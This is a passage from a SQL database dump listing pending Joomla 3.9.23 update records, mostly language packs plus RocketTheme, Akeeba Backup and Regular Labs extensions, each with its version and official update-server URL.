oomla.org/language/details3/ka-GE_details.xml','',''),(26349,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(26350,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(26351,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(26352,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(26353,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(26354,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(26355,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(26356,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(26357,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(26358,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(26359,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(26360,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(26361,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(26362,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(26363,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(26364,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(26365,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(26366,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(26367,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(26368,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(26369,3,0,'English US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(26370,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(26371,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(26372,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(26373,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(26374,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(26375,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(26376,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(26377,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(26378,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(26379,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(26380,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(26381,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(26382,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(26383,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(26384,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(26385,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(26386,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(26387,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(26388,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(26389,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(26390,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(26391,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(26392,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(26393,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(26394,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26395,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(26396,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(26397,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(26398,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(26399,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(26400,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(26401,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(26402,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(26403,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(26404,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(26405,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(26406,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(26407,57,0,'French','','pkg_fr-FR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(26408,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(26409,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(26410,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(26411,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(26412,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(26413,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(26414,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(26415,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(26416,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(26417,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(26418,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(26419,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(26420,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(26421,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(26422,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(26423,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(26424,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(26425,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(26426,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(26427,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(26428,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(26429,57,0,'English US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(26430,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(26431,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(26432,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(26433,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(26434,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(26435,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(26436,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(26437,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(26438,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(26439,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(26440,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(26441,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(26442,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(26443,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(26444,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(26445,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(26446,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(26447,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(26448,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(26449,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(26450,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(26451,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(26452,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(26453,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(26454,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0-1.html',''),(26455,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.1','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-1.html',''),(26456,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(26457,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.7.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeeba.com/download/fof3/3-7-1.html',''),(26460,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26461,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26462,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26463,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0-1.html',''),(26464,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26465,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26466,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26467,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26468,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26469,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26470,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26471,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26472,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26473,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26474,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(26475,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(26476,3,0,'French','','pkg_fr-FR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(26477,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(26478,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(26479,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(26480,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(26481,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(26482,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(26483,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(26484,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(26485,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(26486,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(26487,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(26488,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(26489,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(26490,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(26491,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(26492,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(26493,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(26494,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(26495,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(26496,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(26497,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(26498,3,0,'English US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(26499,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(26500,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(26501,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(26502,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(26503,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(26504,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(26505,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(26506,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(26507,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(26508,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(26509,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(26510,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(26511,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(26512,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(26513,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(26514,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(26515,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(26516,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(26517,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(26518,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(26519,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(26520,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(26521,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(26522,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(26523,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(26524,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(26525,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(26526,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(26527,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(26528,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(26529,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(26530,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(26531,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(26532,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(26533,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(26534,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(26535,57,0,'French','','pkg_fr-FR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(26536,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(26537,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(26538,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(26539,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(26540,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(26541,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(26542,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(26543,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(26544,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(26545,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(26546,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(26547,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(26548,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(26549,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(26550,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(26551,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(26552,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(26553,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(26554,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(26555,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(26556,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(26557,57,0,'English US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(26558,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(26559,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(26560,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(26561,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(26562,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(26563,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(26564,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(26565,57,0,'Serbian 